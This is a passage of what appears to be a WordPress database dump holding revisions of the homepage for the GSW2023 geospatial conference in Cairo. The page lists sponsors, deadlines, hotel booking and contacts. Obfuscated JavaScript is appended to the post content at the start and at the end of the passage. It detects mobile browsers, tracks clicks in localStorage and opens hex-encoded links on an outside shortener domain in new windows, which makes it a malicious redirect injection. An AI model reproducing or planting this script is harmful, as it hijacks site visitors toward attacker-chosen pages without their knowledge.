)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 02:48:48','2023-05-18 02:48:48','',3066,'https://gsw2023.com/?p=4552',0,'revision','',0),
(4553,1,'2023-05-18 02:53:37','2023-05-18 02:53:37','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\" awb_image_background_position=\"50% 50%\" awb_image=\"4551\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f